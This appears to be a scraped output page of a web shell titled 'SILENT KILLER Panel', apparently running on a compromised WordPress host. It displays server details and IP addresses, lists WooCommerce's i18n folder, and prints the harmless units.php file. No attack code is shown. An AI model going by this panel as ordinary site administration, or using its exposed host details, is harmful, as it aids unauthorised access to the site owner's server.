SILENT KILLERPanel

Current Path: > home > codekrsu > > ameliagraphics.com > wp-content > plugins > woocommerce > > i18n > >


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//ameliagraphics.com/wp-content/plugins/woocommerce//i18n//

NameTypeSizeLast ModifiedActions
languages Directory - -
continents.php File 3102 bytes September 23 2020 01:16:50.
countries.php File 11404 bytes June 23 2025 19:46:28.
currency-info.php File 33510 bytes May 28 2024 14:28:20.
locale-info.php File 115784 bytes December 18 2024 22:19:16.
phone.php File 4415 bytes August 20 2020 23:18:50.
states.php File 98202 bytes January 21 2025 18:53:44.
units.php File 680 bytes February 22 2023 07:17:34.

Reading File: /home/codekrsu//ameliagraphics.com/wp-content/plugins/woocommerce//i18n///units.php

<?php
/**
 * Units
 *
 * Returns a multidimensional array of measurement units and their labels.
 * Unit labels should be defined in English and translated native through localization files.
 *
 * @package WooCommerce\i18n
 * @version
 */

defined( 'ABSPATH' ) || exit;

return array(
	'weight'     => array(
		'kg'  => __( 'kg', 'woocommerce' ),
		'g'   => __( 'g', 'woocommerce' ),
		'lbs' => __( 'lbs', 'woocommerce' ),
		'oz'  => __( 'oz', 'woocommerce' ),
	),
	'dimensions' => array(
		'm'  => __( 'm', 'woocommerce' ),
		'cm' => __( 'cm', 'woocommerce' ),
		'mm' => __( 'mm', 'woocommerce' ),
		'in' => __( 'in', 'woocommerce' ),
		'yd' => __( 'yd', 'woocommerce' ),
	),
);

SILENT KILLER Tool